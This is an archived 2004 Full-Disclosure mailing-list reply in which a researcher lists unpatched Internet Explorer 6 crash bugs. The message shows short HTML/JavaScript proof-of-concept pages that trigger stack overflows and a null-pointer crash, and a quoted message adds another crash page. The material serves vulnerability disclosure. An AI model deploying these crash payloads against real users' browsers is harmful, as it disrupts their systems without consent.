lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <001101c4b69a$15ae74b0$0000fea9@grotedoos>
From: skylined at edup.tudelft.nl (Berend-Jan Wever)
Subject: Re: IE bugs (Was: Web browsers - a mini-farce)

Here's some IE bugs out of my own collection that still aren't patched (IE6.0 W2K):

Stack overflows (_not_ buffer overflows):
<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
<HTML> <BODY onLoad="A"><IMG src="::" onError="this.src=this.src;"></BODY> </HTML>

Null pointer:
<HTML style="width:expression(navigate('?#'))">
  <HEAD> <META http-equiv="Page-Enter" content="blendTrans()"> </HEAD>
</HTML>

None of them pose a security-risk and they all require JavaScript. So now I actually forgot why I decided to mention them in a reply to this post. Well, maybe MS can fix them in the next SP now that they know about them...

Cheers,
SkyLined

----- Original Message ----- 
From: "Martin" <nakal@...fuerspam.de>
To: "Michal Zalewski" <lcamtuf@...ttot.org>
Cc: "Full Disclosure" <full-disclosure@...sys.com>
Sent: Wednesday, October 20, 2004 02:38
Subject: Re: [Full-Disclosure] Web browsers - a mini-farce


> Am Mo, den 18.10.2004 schrieb Michal Zalewski um 16:18:
> 
> >   All browsers but Microsoft Internet Explorer kept crashing on a regular
> >   basis
> 
> Here, may I make your collection more complete?
> 
> This one is for IE6 on MS-Windows 2000:
> 
> <html><base href="ftp*://">
> <body>
> <iframe src="????"/>
> </body>
> </html>
> 
> Martin
> 
> PS: No, it's not been discovered by your tool. And I reported
>     it already several years ago.
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ